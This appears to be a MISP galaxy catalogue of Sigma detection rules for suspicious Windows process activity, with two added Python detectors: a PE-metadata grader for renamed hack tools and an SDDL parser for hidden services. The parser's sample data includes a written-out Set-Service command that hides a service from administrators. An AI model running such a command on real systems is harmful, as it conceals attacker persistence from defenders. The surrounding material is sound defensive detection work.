- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_dll_sideloading.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | @gott_cyber |
| creation_date | 2022-08-29 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_deviceenroller_dll_sideloading.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001'] |
Related clusters
To see the related clusters, click here.
Visual Studio Code Tunnel Service Installation
Detects the installation of VsCode tunnel (code-tunnel) as a service.
Internal MISP references
UUID 30bf1789-379d-4fdc-900f-55cd0a90a801 which can be used as unique global reference for Visual Studio Code Tunnel Service Installation in MISP communities and other software using the MISP galaxy
External references
- https://badoption.eu/blog/2023/01/31/code_c2.html - webarchive
- https://ipfyx.fr/post/visual-studio-code-tunnel/ - webarchive
- https://code.visualstudio.com/docs/remote/tunnels - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_service_install.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-10-25 |
| falsepositive | ['Legitimate installation of code-tunnel as a service'] |
| filename | proc_creation_win_vscode_tunnel_service_install.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1071.001'] |
Related clusters
To see the related clusters, click here.
Renamed PingCastle Binary Execution
Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields.
Internal MISP references
UUID 2433a154-bb3d-42e4-86c3-a26bdac91c45 which can be used as unique global reference for Renamed PingCastle Binary Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) |
| creation_date | 2024-01-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_renamed_pingcastle.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059', 'attack.defense-evasion', 'attack.t1202'] |
Related clusters
To see the related clusters, click here.
Fsutil Drive Enumeration
Attackers may leverage fsutil to enumerate connected drives.
Internal MISP references
UUID 63de06b9-a385-40b5-8b32-73f2b9ef84b6 which can be used as unique global reference for Fsutil Drive Enumeration in MISP communities and other software using the MISP galaxy
External references
- Turla has used fsutil fsinfo drives to list connected drives.
- https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' |
| creation_date | 2022-03-29 |
| falsepositive | ['Certain software or administrative tasks may trigger false positives.'] |
| filename | proc_creation_win_fsutil_drive_enumeration.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1120'] |
Related clusters
To see the related clusters, click here.
HackTool - Bloodhound/Sharphound Execution
Detects command line parameters used by Bloodhound and Sharphound hack tools
Internal MISP references
UUID f376c8a7-a2d0-4ddc-aa0c-16c17236d962 which can be used as unique global reference for HackTool - Bloodhound/Sharphound Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2019-12-20 |
| falsepositive | ["Other programs that use these command line option and accepts an 'All' parameter"] |
| filename | proc_creation_win_hktl_bloodhound_sharphound.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1482', 'attack.t1069.001', 'attack.t1069.002', 'attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.
PUA - Seatbelt Execution
Detects the execution of the PUA/Recon tool Seatbelt via PE information or command line parameters
Internal MISP references
UUID 38646daa-e78f-4ace-9de0-55547b2d30da which can be used as unique global reference for PUA - Seatbelt Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-18 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_pua_seatbelt.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1526', 'attack.t1087', 'attack.t1083'] |
Related clusters
To see the related clusters, click here.
Screen Capture Activity Via Psr.EXE
Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
Internal MISP references
UUID 2158f96f-43c2-43cb-952a-ab4580f32382 which can be used as unique global reference for Screen Capture Activity Via Psr.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md - webarchive
- https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Psr/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Beyu Denis, oscd.community |
| creation_date | 2019-10-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_psr_capture_screenshots.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1113'] |
Related clusters
To see the related clusters, click here.
System Network Connections Discovery Via Net.EXE
Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Internal MISP references
UUID 1c67a717-32ba-409b-a45d-0fb704a73a81 which can be used as unique global reference for System Network Connections Discovery Via Net.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_network_connections_discovery.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-12-10 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_net_use_network_connections_discovery.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.discovery', 'attack.t1049'] |
Related clusters
To see the related clusters, click here.
Remote Access Tool - ScreenConnect Execution
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Internal MISP references
UUID 57bff678-25d1-4d6c-8211-8ca106d12053 which can be used as unique global reference for Remote Access Tool - ScreenConnect Execution in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-02-13 |
| falsepositive | ['Legitimate usage of the tool'] |
| filename | proc_creation_win_remote_access_tools_screenconnect.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Related clusters
To see the related clusters, click here.
New Process Created Via Taskmgr.EXE
Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
Internal MISP references
UUID 3d7679bd-0c00-440c-97b0-3f204273e6c7 which can be used as unique global reference for New Process Created Via Taskmgr.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2018-03-13 |
| falsepositive | ['Administrative activity'] |
| filename | proc_creation_win_taskmgr_susp_child_process.yml |
| level | low |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036'] |
Related clusters
To see the related clusters, click here.
Potential Fake Instance Of Hxtsr.EXE Executed
HxTsr.exe is a Microsoft executable described as "Microsoft Outlook Communications". It is part of the Outlook apps and normally resides in the hidden "WindowsApps" subfolder of "C:\Program Files". An instance of hxtsr.exe running from anywhere else may be malware masquerading as HxTsr.exe
Internal MISP references
UUID 4e762605-34a8-406d-b72e-c1a089313320 which can be used as unique global reference for Potential Fake Instance Of Hxtsr.EXE Executed in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Sreeman |
| creation_date | 2020-04-17 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hxtsr_masquerading.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036'] |
Related clusters
To see the related clusters, click here.
HackTool - SharPersist Execution
Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms
Internal MISP references
UUID 26488ad0-f9fd-4536-876f-52fea846a2e4 which can be used as unique global reference for HackTool - SharPersist Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-09-15 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_sharpersist.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053'] |
Related clusters
To see the related clusters, click here.
Suspicious RunAs-Like Flag Combination
Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools
Internal MISP references
UUID 50d66fb0-03f8-4da0-8add-84e77d12a020 which can be used as unique global reference for Suspicious RunAs-Like Flag Combination in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-11-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_privilege_escalation_cli_patterns.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation'] |
Suspicious Process Patterns NTDS.DIT Exfil
Detects suspicious process patterns used in NTDS.DIT exfiltration
Internal MISP references
UUID 8bc64091-6875-4881-aaf9-7bd25b5dda08 which can be used as unique global reference for Suspicious Process Patterns NTDS.DIT Exfil in MISP communities and other software using the MISP galaxy
External references
- https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1 - webarchive
- https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1 - webarchive
- https://pentestlab.blog/tag/ntds-dit/ - webarchive
- https://github.com/zcgonvh/NTDSDumpEx - webarchive
- https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/ - webarchive
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration - webarchive
- https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-03-11 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_ntds.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.003'] |
Related clusters
To see the related clusters, click here.
User Added to Local Administrators Group
Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
Internal MISP references
UUID ad720b90-25ad-43ff-9b5e-5c841facc8e5 which can be used as unique global reference for User Added to Local Administrators Group in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-12 |
| falsepositive | ['Administrative activity'] |
| filename | proc_creation_win_susp_add_user_local_admin_group.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.t1098'] |
Related clusters
To see the related clusters, click here.
Renamed Sysinternals Sdelete Execution
Detects the use of a renamed SysInternals Sdelete binary. Renaming the tool is not something an administrator would normally do
Internal MISP references
UUID c1d867fe-8d95-4487-aab4-e53f2d339f90 which can be used as unique global reference for Renamed Sysinternals Sdelete Execution in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md - webarchive
- https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-09-06 |
| falsepositive | ['System administrator usage'] |
| filename | proc_creation_win_renamed_sysinternals_sdelete.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.impact', 'attack.t1485'] |
Related clusters
To see the related clusters, click here.
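This rule, "Renamed PingCastle Binary Execution", "PUA - Seatbelt Execution" and "HackTool - EDRSilencer Execution" all rest on one idea: the PE version resource (OriginalFileName, Description, Product) survives a rename on disk, so a tool can be recognised regardless of what the attacker called the file. The grader below is an added example for this page and not the rules' own logic; the watchlisted OriginalFileName values and Description keywords are assumptions to be verified against real samples, and the events are constructed Sysmon-style records.

```python
import ntpath
from typing import Dict, List, Optional

# Watchlist keyed by the OriginalFileName stored in the PE version resource.
# The names are what these projects are assumed to ship; verify against samples
# from your own environment before relying on them.
WATCHLIST_ORIGINAL_NAMES = {
    "pingcastle.exe": "PingCastle",
    "sdelete.exe": "Sysinternals SDelete",
    "sdelete64.exe": "Sysinternals SDelete",
    "seatbelt.exe": "Seatbelt",
    "edrsilencer.exe": "EDRSilencer",
}
# Fallback keywords for the Description / Product fields (also assumptions).
WATCHLIST_KEYWORDS = ("pingcastle", "sdelete", "seatbelt", "edrsilencer")
# How a stripped version resource tends to show up in process-creation logs.
MISSING = ("", "-", "?")


def evaluate(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Grade one process-creation event on its PE metadata.

    high   : a watchlisted OriginalFileName running under a different file name
    medium : a watchlisted tool running under its own name, or recognised only
             through Description/Product
    low    : any other mismatch between file name and OriginalFileName
    None   : nothing to report
    """
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").strip().lower()
    desc = (event.get("Description", "") + " " + event.get("Product", "")).lower()

    tool = WATCHLIST_ORIGINAL_NAMES.get(original)
    if tool is not None:
        if image != original:
            return {"level": "high",
                    "reason": f"renamed {tool}: {image} has OriginalFileName {original}"}
        return {"level": "medium", "reason": f"{tool} executed as {image}"}
    if any(k in desc for k in WATCHLIST_KEYWORDS):
        return {"level": "medium",
                "reason": f"Description/Product names a watchlisted tool ({image})"}
    if original not in MISSING and image != original:
        return {"level": "low", "reason": f"{image} differs from OriginalFileName {original}"}
    return None


def triage(events: List[Dict[str, str]]) -> List[Optional[str]]:
    """Severity per event, None where nothing was found."""
    return [(verdict or {}).get("level") for verdict in map(evaluate, events)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "OriginalFileName": "PingCastle.exe", "Description": "", "Product": ""},
    {"Image": r"C:\Tools\sdelete64.exe",
     "OriginalFileName": "sdelete64.exe", "Description": "SDelete", "Product": "Sysinternals"},
    {"Image": r"C:\ProgramData\upd.exe",
     "OriginalFileName": "-", "Description": "Seatbelt", "Product": ""},
    {"Image": r"C:\Users\bob\Downloads\setup.exe",
     "OriginalFileName": "installer.exe", "Description": "Vendor setup", "Product": "Vendor"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "Description": "Notepad", "Product": "Windows"},
]

if __name__ == "__main__":
    for ev, verdict in zip(SAMPLE_EVENTS, map(evaluate, SAMPLE_EVENTS)):
        print(f"{(verdict or {}).get('level', '-'):6} {ev['Image']}")
```

The version resource is attacker-controlled: a resource editor strips or rewrites it in seconds. That is why the rules on this page pair it with command-line patterns, and why the low-confidence mismatch branch is better used to enrich an event than to alert on its own.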
Potentially Suspicious Usage Of Qemu
Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
Internal MISP references
UUID 5fc297ae-25b6-488a-8f25-cc12ac29b744 which can be used as unique global reference for Potentially Suspicious Usage Of Qemu in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR) |
| creation_date | 2024-06-03 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_qemu_suspicious_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1090', 'attack.t1572'] |
Related clusters
To see the related clusters, click here.
Abuse of Service Permissions to Hide Services Via Set-Service
Detects usage of the "Set-Service" PowerShell cmdlet to configure a new security descriptor that hides a service from other utilities such as "sc.exe" and "Get-Service" (works only in PowerShell 7)
Internal MISP references
UUID 514e4c3a-c77d-4cde-a00f-046425e2301e which can be used as unique global reference for Abuse of Service Permissions to Hide Services Via Set-Service in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 - webarchive
- https://twitter.com/Alh4zr3d/status/1580925761996828672 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-17 |
| falsepositive | ['Rare intended use of hidden services'] |
| filename | proc_creation_win_powershell_hide_services_via_set_service.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1574.011'] |
Related clusters
To see the related clusters, click here.
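The trick the rule above describes is a service DACL whose deny ACEs withhold SERVICE_QUERY_STATUS from interactive users, service accounts and even administrators, so sc query and Get-Service no longer list the service. The parser below is an added example for this page, not the rule's or the galaxy's code: it extracts the SDDL from a Set-Service -SecurityDescriptorSddl command line, decodes the two-letter service rights, and reports which trustees end up blind. The command lines are constructed; the hiding SDDL follows the pattern from the references.

```python
import re
from typing import List, NamedTuple, Optional

# SDDL right abbreviations as interpreted for service objects (the generic
# CC/DC/LC/... letters map to object-specific rights; this is the service map).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG",       "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS",       "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START",              "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE",     "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
# Rights whose denial removes the service from enumeration for that principal:
# the listing tools only return services whose status the caller may query.
ENUMERATION_RIGHTS = {"LC", "GR", "GA"}


class Ace(NamedTuple):
    ace_type: str        # 'A' = access allowed, 'D' = access denied, ...
    rights: List[str]
    trustee: str         # SID or two-letter alias such as BA, IU, SU, SY


def decode_rights(rights_field: str) -> List[str]:
    """'DCLCWPDTSD' -> ['DC', 'LC', 'WP', 'DT', 'SD']; hex masks pass through."""
    if rights_field.lower().startswith("0x"):
        return [rights_field]
    return [rights_field[i:i + 2] for i in range(0, len(rights_field), 2)]


def parse_dacl(sddl: Optional[str]) -> List[Ace]:
    """Pull the DACL ACEs out of an SDDL string; the SACL (S:...) is ignored."""
    if not sddl:
        return []
    m = re.search(r"D:[PAIRO]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        parts = body.split(";")       # ace_type;flags;rights;object;inherit;sid
        if len(parts) < 6:
            continue
        aces.append(Ace(parts[0].upper(), decode_rights(parts[2].upper()), parts[5]))
    return aces


def hidden_from(sddl: Optional[str]) -> List[str]:
    """Trustees that a deny ACE strips SERVICE_QUERY_STATUS from. Deny ACEs are
    evaluated before allow ACEs, so a later allow for the same trustee (as for
    BA in the sample below) does not undo the effect."""
    return [ace.trustee for ace in parse_dacl(sddl)
            if ace.ace_type == "D" and ENUMERATION_RIGHTS & set(ace.rights)]


SDDL_ARG = re.compile(r"-SecurityDescriptorSddl\s+[\"']?([^\"'\s]+)", re.IGNORECASE)


def sddl_from_cmdline(cmdline: str) -> Optional[str]:
    """Extract the SDDL passed to Set-Service -SecurityDescriptorSddl, if any."""
    m = SDDL_ARG.search(cmdline)
    return m.group(1) if m else None


# Constructed sample command lines (not real telemetry). The first follows the
# hiding technique from the references: deny change-config, query-status, stop,
# pause and delete to interactive users, service accounts and administrators.
HIDING_CMD = ('pwsh.exe -c Set-Service -Name "WinUpdSvc" -SecurityDescriptorSddl '
              '"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)'
              '(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)'
              '(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"')
BENIGN_CMD = ('pwsh.exe -c Set-Service -Name "MyAppSvc" -SecurityDescriptorSddl '
              '"D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)'
              '(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"')

if __name__ == "__main__":
    for cmd in (HIDING_CMD, BENIGN_CMD):
        print("hidden from:", hidden_from(sddl_from_cmdline(cmd)) or "nobody")
```

The same DACL can be set with sc.exe sdset, which this rule does not cover; a deny ACE naming BA (Builtin Administrators) is the strongest signal, since no legitimate service needs to be invisible to its own administrators.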
Proxy Execution Via Wuauclt.EXE
Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.
Internal MISP references
UUID af77cf95-c469-471c-b6a0-946c685c4798 which can be used as unique global reference for Proxy Execution Via Wuauclt.EXE in MISP communities and other software using the MISP galaxy
External references
- https://dtm.uk/wuauclt/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wuauclt_dll_loading.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team |
| creation_date | 2020-10-12 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wuauclt_dll_loading.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218', 'attack.execution'] |
Related clusters
To see the related clusters, click here.
Port Forwarding Activity Via SSH.EXE
Detects port forwarding activity via SSH.exe
Internal MISP references
UUID 327f48c1-a6db-4eb8-875a-f6981f1b0183 which can be used as unique global reference for Port Forwarding Activity Via SSH.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-12 |
| falsepositive | ['Administrative activity using a remote port forwarding to a local port'] |
| filename | proc_creation_win_ssh_port_forward.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.lateral-movement', 'attack.t1572', 'attack.t1021.001', 'attack.t1021.004'] |
Related clusters
To see the related clusters, click here.
Chopper Webshell Process Pattern
Detects patterns found in process executions caused by China Chopper-like tiny (ASPX) webshells
Internal MISP references
UUID fa3c117a-bc0d-416e-a31b-0c0e80653efb which can be used as unique global reference for Chopper Webshell Process Pattern in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), MSTI (query) |
| creation_date | 2022-10-01 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_webshell_chopper.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.discovery', 'attack.t1505.003', 'attack.t1018', 'attack.t1033', 'attack.t1087'] |
Related clusters
To see the related clusters, click here.
Suspicious SYSTEM User Process Creation
Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)
Internal MISP references
UUID 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 which can be used as unique global reference for Suspicious SYSTEM User Process Creation in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), David ANDRE (additional keywords) |
| creation_date | 2021-12-20 |
| falsepositive | ['Administrative activity', 'Scripts and administrative tools used in the monitored environment', 'Monitoring activity'] |
| filename | proc_creation_win_susp_system_user_anomaly.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1134', 'attack.t1003', 'attack.t1027'] |
Related clusters
To see the related clusters, click here.
New Remote Desktop Connection Initiated Via Mstsc.EXE
Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Internal MISP references
UUID 954f0af7-62dd-418f-b3df-a84bc2c7a774 which can be used as unique global reference for New Remote Desktop Connection Initiated Via Mstsc.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_remote_connection.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-07 |
| falsepositive | ['WSL (Windows Sub System For Linux)'] |
| filename | proc_creation_win_mstsc_remote_connection.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.lateral-movement', 'attack.t1021.001'] |
Related clusters
To see the related clusters, click here.
Use of Scriptrunner.exe
The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting
Internal MISP references
UUID 64760eef-87f7-4ed3-93fd-655668ea9420 which can be used as unique global reference for Use of Scriptrunner.exe in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-01 |
| falsepositive | ['Legitimate use when App-v is deployed'] |
| filename | proc_creation_win_lolbin_scriptrunner.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Suspect Svchost Activity
It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.
Internal MISP references
UUID 16c37b52-b141-42a5-a3ea-bbe098444397 which can be used as unique global reference for Suspect Svchost Activity in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | David Burkett, @signalblur |
| creation_date | 2019-12-28 |
| falsepositive | ['Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf'] |
| filename | proc_creation_win_svchost_execution_with_no_cli_flags.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055'] |
Related clusters
To see the related clusters, click here.
Suspicious Mstsc.EXE Execution With Local RDP File
Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
Internal MISP references
UUID 6e22722b-dfb1-4508-a911-49ac840b40f8 which can be used as unique global reference for Suspicious Mstsc.EXE Execution With Local RDP File in MISP communities and other software using the MISP galaxy
External references
- https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/ - webarchive
- https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml - webarchive
Associated metadata
